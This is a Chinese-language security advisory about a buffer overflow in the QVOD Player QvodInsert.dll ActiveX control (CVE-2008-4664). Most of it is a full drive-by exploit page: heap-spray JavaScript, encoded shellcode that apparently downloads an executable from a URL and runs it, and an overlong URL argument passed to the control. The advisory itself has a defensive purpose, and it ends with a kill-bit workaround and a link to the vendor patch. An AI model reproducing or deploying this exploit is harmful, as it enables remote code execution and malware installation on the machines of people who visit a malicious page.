安全研究
安全漏洞
快播QvodInsert.dll控件超长URL缓冲区溢出漏洞
发布日期:2008-01-11
更新日期:2009-07-16
受影响系统:
QVOD Technology QVOD Player 2.1.5不受影响系统:
QVOD Technology QVOD Player 2.1.5 build 0053描述:
BUGTRAQ ID: 27271
CVE(CAN) ID: CVE-2008-4664
快播(QvodPlayer)是一款基于准视频点播(QVOD)内核的多功能、个性化的播放器软件。
快播在安装快播的过程中会向系统注册一个ActiveX控件(QvodInsert.dll),这个控件没有正确地验证用户所提供的URL参数。如果用户受骗访问了恶意网页并提供了超长参数的话,就可以触发缓冲区溢出,导致执行任意指令。
<*来源:MuMa_Reader
链接:http://hi.baidu.com/muma_reader/blog/item/29f50e2aff63263c5343c18d.html
http://secunia.com/advisories/28494/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<body>
<object classid="clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF" name="evil" width=100 height=200>
</object>
<script>
var heapSprayToAddress = 0x05050505;
var shellcode = unescape("%u9090"+"%u9090"+
"%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320" +
"%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2" +
"%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b" +
"%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b" +
"%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a" +
"%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b" +
"%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40" +
"%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83" +
"%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8" +
"%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52" +
"%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff" +
"%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40" +
"%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f3a" +
"%u312f%u3732%u302e%u302e%u312e%u742f%u7365%u2f74" +
"%u2e64%u7865%u0065");
var heapBlockSize = 0x400000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0505%u0505");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory = spraySlide + shellcode;
}
try
{ var a=new Array(813);
a=a+"7rBJ"+"aaaaaaaaaccccccccccccccccccccccccccvvvvvvvvvvvvvvvvvvvvvvvvvvvbbbbbbbbbbbbbbbbbbbbbbnnnnnnnnnnnnnnnnnnnnnnnnnnnnhhhhhhhhhhhhhhhhhhhhhhhhhh";
document.write(evil.URL=a);
}
catch(e){}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</script>
</body>
</html>
建议:
临时解决方法:
* 为clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF设置kill bit。
厂商补丁:
QVOD Technology
---------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://update.qvod.com/QvodSetup.exe
浏览次数:2900
严重程度:0(网友投票)
绿盟科技给您安全的保障